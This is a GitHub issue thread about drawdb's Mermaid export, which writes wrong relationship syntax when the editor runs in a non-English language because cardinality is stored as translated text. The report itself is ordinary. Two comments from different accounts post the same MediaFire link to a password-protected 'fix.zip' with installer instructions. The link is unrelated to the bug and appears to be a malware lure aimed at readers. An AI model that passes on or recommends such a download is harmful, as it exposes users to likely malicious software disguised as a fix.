### ISSUE TITLE
[BUG] Export as MERMAID is not working correctly for any language other than English.

### ISSUE THREAD

**Issue by sunrize** [drawdb-io/drawdb#231]
**Describe the bug**
When using the editor in a language other than English, exporting a diagram with relationships between tables results in a file with incorrect relationship syntax. For example, `table_0 -- table_1 : references` instead of `table_0 ||--|| table_1 : references`. Setting the language back to English does not change the result, and the "Cardinality" option text in the interface also doesn't appear to change.

**To Reproduce**
Scenario 1. Using the editor exclusively in a language other than English.
1. Open the editor
2. Change the language to any language other than English
3. Create a new empty document
4. Add two tables and a relationship between them
5. Export the diagram as MERMAID
6. See result:
```md
erDiagram
	table_0 -- table_1 : references

	table_0 {
		INT id
	}

	table_1 {
		INT id
	}
```
7. Export the diagram as DRAWDB for use in scenario 2.

Scenario 2. Importing diagram created in any language other than English.
1. Open the editor
2. Change the language to English
3. Create a new empty document
4. Import diagram
5. Export diagram as MERMAID
6. See result:
```md
erDiagram
	table_0 -- table_1 : references

	table_0 {
		INT id
	}

	table_1 {
		INT id
	}
```

_Additional bug in scenario 2 or when changing the interface language:_
1. In the editor, open "Relationships" and notice that the text in the "Cardinality" field is not in English.
2. Open the exported `*.ddb` file and check the `cardinality` property.
```json
  "relationships": [
    {
      "startTableId": 0,
      "startFieldId": 0,
      "endTableId": 1,
      "endFieldId": 0,
      "cardinality": "Eins zu eins",
      "updateConstraint": "No action",
      "deleteConstraint": "No action",
      "name": "table_0_id_fk",
      "id": 0
    }
```

**Expected behavior**
Expected result for both scenarios:
```md
erDiagram
	table_0 ||--|| table_1 : references

	table_0 {
		INT id
	}

	table_1 {
		INT id
	}
```

_Additional bug:_
1. The text in the "Cardinality" dropdown field in the interface should function similarly to the "On update" and "On delete" fields.
2. The `cardinality` property should be agnostic to the interface language.

**Screenshots**
_Additional bug 1:_
![Language-1](https://github.com/user-attachments/assets/7a809756-031d-4360-b439-696eee443e81)
![Language-2](https://github.com/user-attachments/assets/08213aba-f965-4a41-8967-b66971fbdd30)

**Desktop (please complete the following information):**
 - OS: Windows 10
 - Browser: Chrome

**Additional context**
[Deutsch_2024-08-26T07_25_57.208Z.md](https://github.com/user-attachments/files/16746540/Deutsch_2024-08-26T07_25_57.208Z.md)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1ilit** [comment]
Feel free to reopen the issue if it still persists
